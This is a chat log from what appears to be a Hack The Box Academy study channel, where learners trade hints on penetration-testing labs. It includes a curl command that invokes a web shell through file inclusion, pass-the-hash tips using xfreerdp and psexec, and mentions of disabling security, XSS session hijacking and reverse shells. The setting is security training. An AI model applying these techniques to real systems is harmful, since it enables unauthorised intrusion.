list given in assignment is not working

Or: your previous attempts were using the wrong failure string

And you discounted it because it was only behaving as intended

attacking common services requies you to brute force http bauth? you sure you're hitting the right place?

i got a valid user with smtp-user-enum. tried it on http basic auth. did'nt work. now trying the user on various services ftp,mysql,rdp

yeah it is surely not a good place to start with. this whole assignment is testing my patience. like bruteforciing is gonna work with real target.

It absolutely does not lol

I don't recall needing to do any http bruteforce with that module

What section?

skill assignment -easy. yeah i figured out http bruteforce is waste.

got an smtp user now trying its pass

lol even the walkthroughs are using rockyou. and mine says it will be completed in 1867 hr.

That's impractical

Oh wait yeah, it's in rockyou

Just checked but it's fairly high on the list

That's for it to run the full list, also iirc you need to use the @domain

Yeah it's within the first 200 fwiw so it's not gonna take the full 1k hours

Can anyone explain the grep -v "<.>" portion of
curl -s -w "\n" 'http://STMIP:STMPO/index.php?language=./profile_images/shell.gif&cmd=ls+/' | grep -v "<.>"
???

It's from the LFI and file uploads section

There's nothing in the man page besides the -v option and all it says is invert

Would you mind if I asked you more about this?

I haven't made forward progression on this yet, but I have an idea about how I might get there. I'd just like to validate assumptions.

it helps if you wrap the command in backticks

also you're sharing from the walk-through

i take it you're trying to say \<.*\>?

basically think what grep -v does, and then apply it to the scenario

you're that far into the course you should understand at bare minimum how grep works, and what special characters are

No, no backticks in the example

i'm not saying there are backticks in the example

did you mean backslash?

Yeah

again if you wrap YOUR command that you're copying in backticks it's easier to see your command formatting

I see what the <.*> is accomplishing i'm just not sure what it's actually doing

otherwise if text has a * at the start and end of a statement *like this* discord formats it like this

Thanks. I'll see to it later on. currently doing the hard one and in that i got the admin password. but it is saying its wrong. is that intentional?

i don't recall getting admin pw in common services - hard, just pure impersonation

i'll refer you back to the SQL section for advice on where and what to look for

it's grepping for the left angle bracket, then any number of characters, then right angle bracket

Try to think various ways how add_uder or delete_user could be abused. You'll get it, dont overcompliate it and you only need one of those parameters to it.

and filtering lines that have those. out

so you're left with text that isn't in html formatting or code formatting

Aha! That makes sense now!

Thank you!

literally takes a few seconds of thinking

or at least doing the command without the grep

and with it to see the difference

¯_(ツ)_/¯

Yeah, there was nothing in the grep man page though that showed the operators after -v just that it inverted

yes

what does inverted mean, and apply that to grep

if normal grep includes what you search for, inverted...

Which nmap scan is actually stealthier? -sS or -sT?

usually -sS because it doesn't complete the full connection

Is it a mistake in the Network Enumeration with Nmap module then? Cuz it says -sT is stealthier since it makes a full connection? I'm confused cuz I've read in some places that -sS is stealthier as well.

it goes SYN -> SYN-ACK -> RESP iirc (which cuts the handshake before it completes*

the other thing to consider is that it's kinda suspicious to not fully connect to a port

So it could really be either depending on the environment?

normal behavior would be connect to a port; then cutting the connection

yep

Is there a recommended one? Like one generally over the other when beginning to enumerate an environment?

Syn is slower by design

so if you find your scans taking forever, sT is the way to go

i was not able to connect with the mssql service. it gave "
A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified) (.Net SqlClient Data Provider)"

Wait, I thought -sT was slower since it makes a full connection and waits for a response before moving onto the next port?

i didn't have issues with sqlcmd from f* POV

it's because of how -sS works, it makes assumptions and sometimes queries a port a few times if it's unsure

So... -sT is faster and more reliable?

ye

I see. Thanks. I got one more question, the module also talks about tracing packets, and uses the following parameters when doing so: -Pn --disable-arp-ping -n. Is it safe to assume using these parameters when normally scanning helps with the speed without affecting the results?

https://nmap.org/book/man-port-scanning-techniques.html

-Pn disables ICMP ping, nmap normally sends an ICMP echo request to see if a host is up Windows often has it disabled to respond to ICMP echo
--disable-arp-ping disables address-resolution-protocol ping
-n disables reverse dns lookup

https://nmap.org/book/man-briefoptions.html

basically tells nmap "this host is fine, trust me bro"

i believe the options are explained in the nmap module

They are.

I was just wondering if those options affect the speed of scans in any way.

it skips sending any type of pings

and just sends the connection packets

I see. So it does affect slightly.

-sT scan is not faster. It makes a full TCP handshake while -sS doesnt so its much faster.

i've also had issues with -sS where an -sT scan makes it work

against the same target

¯_(ツ)_/¯

i.e. Syn scan getting stuck at like 99%

where TCP works fine

Dont know about that with certain target, but overall and technically its just faster

Oh okay. Thanks for clarifying.

So -sS is generally the better go-to option?

just use what reliably works for you

Alrighty, thanks to the both of you.

i wouldn't say it's generally the better go-to. if you're performing a lot of half handshake requests sometimes a firewall may block you, so it may actually be better to do a slower full handshake scan

really depends on the target

Guys am doing Password Attacks - Medium lab:
I have got access to the machine using jason credentials but am stuck on obtaining the root flag.

Keep looking around, reading things is helpful- start there

The documentation that gives you j* also hints at something

Hi guys quick question

Anyone please respond

Tier 0 Fundamental General 6 hours
This module covers the fundamentals required to work comfortably with the Linux operating system and shell.

the 6 hours is the estimated time or expiry time

if i unlock the module will it expire in 6 hours?

it is the estimated time of completion

Oh okay Thanks!

hi everyone
im stuck at the (xss ---> Session Hijacking ) i tried every payload on the section but my php listener doesnt get any thing

you can DM me

am i only one who is having troubles to spawn machines in module? i mean it just disconnects you after 2-3 mins

Are HTB laboratories doing poorly? I connect via xfreerdp and the screen stays black....

try pressing the space bar

it worked xd

ok

Hello everyone, I'm currently working on Analyzing Evil With Sysmon & Event Logs module and struggling with accessing sysmon as said in instructions - C/tools/sysmon.exe, it's just not opening (shutting down after a sec.). Does anyone have any suggestions?

how are you opening it?

are you double clicking on the file?

@next bronze I did it! I got in with pth of the svc user! :D

Of AD Skill assessment 2.

good job

Right click and open as an Admin.

now I gotta transfer the...what was it called.

Sharphound

It's a command line interface app, not GUI. Try opening a command prompt and running it from there.

And get the .zip and do some bloodhound stuff

I tried to run a command in regular cmd (C:\Tools\Sysmon> sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n) but got an error.

I wonder, if ABXXX has rdp rights, can I rdp with his user, and pth mimikatz with the svc account hash so I get cmd from the svc who has admin righs?

Cuz rn I can't find rdp tool which uses pth.

i'd have to see the command, but i tried it on my pc and it worked fine. just open an elevated command prompt and run it out of the directory with .\sysmon.exe

xfreerdp can pth /pth:ntHash, psexec/netexec and a lot of other tools can also pth remotely, there's no need to use mimi for it

Breh. On it then

I didn't see it in the --help which is weird.

https://www.kali.org/blog/passing-hash-remote-desktop/

now I gotta do PS one liners to disable security

why do you need to rdp tho? it's poopoo, just get a shell

It's cuz I can drag n drop

;-;

But I will do a shell either way, esketit

Yoo, I can transfer the tools with the ab account to the main C drive and shell with the svc and do shenanigans from there on

Can you provide more details, if I understood you correctly I have to open a regular cmd and past the command there?

you have a space after the directory before the binary, you have a > at the end of the directory, so it's not going to work

c:\should\be\full\path\to\the.exe

Something wrong?

make soure the path is correct, check your command

sure, many ways to do it

Look at the very first part of your command. Your directory ends with ">". It should be "\". Directly after that, you shouldn't have a space before the "sysmon.exe" part. All the rest of the spaces are fine.

It helped, thanks a lot for you contribution. Why in instructions it's not correct?

i don't have that module so i don't know what the instructions are, but my guess is they are simply in the directory already and aren't typing out the full path

oh yeah, that's what it is, i see it in your screenshot

Can somebody lend a hand with HTTP ATTACKS Skills ssessment?

Im having that same issue, response of the smuggled call is nested on the first one. Any hints how you solved it?

"To utilize the updated Sysmon configuration, execute the following.

Analyzing Evil With Sysmon & Event Logs
C:\Tools\Sysmon> sysmon.exe -c sysmonconfig-export.xml"

I've changed to the correct form without spaces and now there is an error related to non existence of the file. Any thoughts?

help pls

nvm got it

AD Skill Assessment 2 - completed.

I got it with that method, just ensure that your email client isn't pointing to the expired box. I got about 9 emails before I realised I was looking at an empty inbox from the last expired target.

thanks for the hint. Could I DM you?

the kali disconnects after like 2 mins there is something wrong with the machine in this section

Switch vpns.

From eu academy to us for example.

Don;t forget to download the new vpn files after you switch.

• give the machine some time to load, it could break pipes a lot.

its happening periodically

disconnects every 2 mins

btw im doing it with pwnbox and pwnbox connection is fine

this is just super annoying fix that kali

i ran this like a million times now

screw this rdp in rdp in rdp

Isn't your password Slavi123

Or whatever it was...user was diff as well.

first i need to rdp to kali then to the target using that bob:Slavi123

btw it works now after changing vpn server, ty

for whatever reason copy paste isnt working with tcp connection, so i need to type the flag lol

yep ull get used to it, i was so tilted when doing this module last week

......

windows module machines are trash

i would finish an entire module than this one section ahh

Windows machines on average take a little longer to spin up all the services.

im out fix the damn machines pls

sorry for my mental breakdown in chat yesterday i was having a bit of a rough day

@next bronze sorry i snapped at you

hello guys,

What is the membercount: of the "Interns" group?

I couldn't execute this query with bloodhound, I don't know exactly how to do it.

all good

I mean just google how to get domain goroup member count, doesn't have to be bh

I believe the module and sections gives you a command

Bloodhound is very much a crutch that people rely way too heavily on

It's a useful tool, sure, but it isn't a one and done tool

okey thx

Hey quick question, I'm reading about GPOs order of precedence and this paragraph confused me a bit.
if Disallow LM Hash has precedence over Block Removeable Media and Disable Guest Account, wouldn't that mean it is processed last?

And another question, in this example, if I set 2 GPOs to Enforced, one in the domain level and one in the OU, will the OU enforced one overwrite the domain level enforced one?

precedence means it his priority

think golf, lower number better

Exactly, if it has priority wouldn't that mean it's processed last?

no

whichever is processed first has the final say

But this is written earlier in the section

a GPO attached to a specific OU would have precedence over a GPO attached at the domain level because it will be processed last and could run the risk of overriding settings in a GPO higher up in the domain hierarchy. ```

Thats why im confused

https://www.globalknowledge.com/us-en/resources/resource-library/articles/4-tips-and-tricks-for-microsoft-windows-group-policy/#gref

it is written here that GPOs that Windows processes last have the highest precedence.

https://blog.netwrix.com/2019/07/02/getting-group-policy-object-precedence-right/

it just depends; in a domain environment - Windows (Local) is almost never used

small number = processed last

sorry i misspoke

but precedence order = reverse application order

Understandable, anyways thanks for the resources I'll read those

So was it a mistake from the academy?

nope

in the case with (enforced) they are enforced last, thus take precedence

think of it this way it's a FILO stack

the stack is in an order, but only the last is taken until it's iterated through

If small number = processed last and Disallow LM Hash is the smallest number, it should be processed last shouldn't it?

it's processed after Disable Guest Account and Block Removable Media

in this scenario it's 6 -> 5 -> 4 -> 3 -> 2 -> 1

Yeah, and it says in the paragraph there that its processed first

read like the last 2 sentences here

ah

it's just confusing wording i think

GPOs are weird overall

hey is THM's jr pentester path worth my time if i'm planning on doing CPTS afterwards
someone recommended i do the jr pentester path before CPTS

you can suggest a change to wording in #1234357888114364508 under the category "typo"

sure, if you need more confidence to tackle the CPTS path there's nothing wrong with it

the quality will be vastly different

but as long as you're learning something along the way ¯_(ツ)_/¯

noted

thanks, i'll give it a shot

I will, thanks for the help

CPTS and it's related Information Security Foundations path prepare you well enough for the exam

but nothing wrong with sourcing your information from multiple places

¯_(ツ)_/¯

yeah i'm currently on infosec foundations and once i finish that i'm going to finish cisco's intro to networking course

because it's free and it's cisco and if there's any resource in the world i would trust to teach me networking it would be cisco

Networking is rough to start with, then once you understand the logic it's super easy

so i've heard

some of it made sense really easily and some of it is still really confusing

yeah you can find lots of networking documentation for free that are CCNA and Cisco pdfs

the cisco networking course goes into much more detail and material than the HTB intro to networking module

subnet masks are nearly the most confusing

agreed

just remember you fill bits left to right

i'm hoping cisco explains subnetting better than HTB

tbf subnetting isn't a huge part of hacking, understanding the different subnets sure

but actually setting a subnet, not really

not discounting that it's not useful to learn

it definitely helps you, at a glance, determine if 2 ips are in the same subnet or not

i.e. 172.16.5.x vs 172.16.6.x

that's slightly reassuring

the only thing you might need to know subnetting/routing for is if you use a tool like ligolo where you have to set the interface up

but it's not really that hard, and plenty of guides out there for it :)

yeah i just found a subnetting calculator and i doubt i'll ever need to do any mental subnetting except maybe for an exam

yeah unless you're doing a CompTIA exam, you don't really need to manually do it

also writing it down can help

idk if i shared the link in here but i'll see if I can refind it, but it's a CCNA learning section about subnetting that's actually really well diagramed - you'll probably run across it

eh not what i was looking for but while it doesn't explain it, it does do the math a bit http://www4.northampton.edu/kmanna/Cisco_Student_Web/SG/How-to-Subnet 10.pdf

https://www.youtube.com/watch?v=4kMGs9-HDEk&ab_channel=ProfessorMesser and ofc professor messer

didn't knew cpts cover more than 50% of cbbh

it's mostly the web related stuff that overlaps

that's about it; cpts scratches the surface of web, cbbh digs into it more

i am glad i chose cpts first

now cbbh would look ezier

most people would actually say the opposite

as techniques in cbbh can make some web portions of the cpts path trivial

but that's neither here nor there

which path you doing now a days

as long as it works for you

still on CPTS; need to prioritize school first before diving back into the path

school?

i am old af

Im in kindergarden aswell (not, befire someoen reports it)

uni

for reference highschool for me was at least a decade ago ;w;

Damn ancient

now i feel good

Im having a 10y anniversray from my elementary this year

just a baby

https://tenor.com/view/diaper-tom-and-jerry-baby-changing-diapers-gif-5589389

Knowing that there are people here from the time when dinosaurs roamed the earth makes me feel a little better about myself

the oldest people in here are floating around like their 50s

@sour sigil this guy is in his 50s

oof if that's his profile

I am on Server Side attacks module on the SSTI example 3. Can't seem to get the reverse shell to work, gives me an error everytime

genuinely on a public IP you're not gonna get a reverse shell

you're gonna have to do other things

as a general rule of thumb: Public IP = Shell not intended

ok so I just got sent into a rabbit hole by them giving a reverse shell payload.

so I just use tplmap?

I solved it

Hi, did you figure out why you got the answer? Can you DM me when you are free?

the reverse shell works if it's a private domain that shares an interface

or you have a remote C2 you're operating

Hello guys I am new here I just want to learn if you can help me I really appreciate it

if you have a problem with an academy module you can pose the question here with:

1. the module name (and link)
2. the section name
3. what you're having trouble with (don't just repeat the question in the section)
4. what you've tried
   bear in mind: avoid spoilers where possible; omit usernames and passwords
   wrap command bits in backticks "`" (note for large blocks of code, the automod might detect it as "spam" and delete it, you'll need to link your HTB Labs account following #welcome to be able to avoid that)
   e.g. nmap -p- IP

if you don't use backticks something like *l blahblahblah* will get formatted as l blahblahblah

large code blocks can be formatted with
```[code language (optional)]
code
```
(on mobile the code language syntax highlighting isn't shown)

import library
print("thing")

where is the FQDN in this?

can anybody help with a FQDN question?

in the CPTS

What exactly don't you understand? What do you need help with?

sub.domain.tld. though usually you can take out the trailing .

Think how you visit the base page of a website

so sub.name.tld?

Ye

alright linux fundementals done
what should i go for next? anything i would like?

Do the information Security Foundations path

alright great

After that it's really just whatever interests you

thanks alot

We don't know what your interests are so we can't say what would interest you lmao

yeah ofc

oh shit i just realised linux fundementals was just a part of it (security foundations) LMAOO

loll

im like tf is happening

Hey, I'am having hard time understanding mssql hash stealing and impersonisation. Any sources you recommend? i tried some blogs and still not able to understand the dynamics of it. any beginer freindly sources?

which module are ypu doing?

cause i dont remember any attack of mssql hash stealing

attacking common services

thanks for the guidelines. What would bt considered to be a spoiler? Im having troubles drawing the line between explaining what Ive done and keep it totally spoiler free

Usernames, passwords, direct file locations

the topic is still there in academy module. so i wanted to understand it too.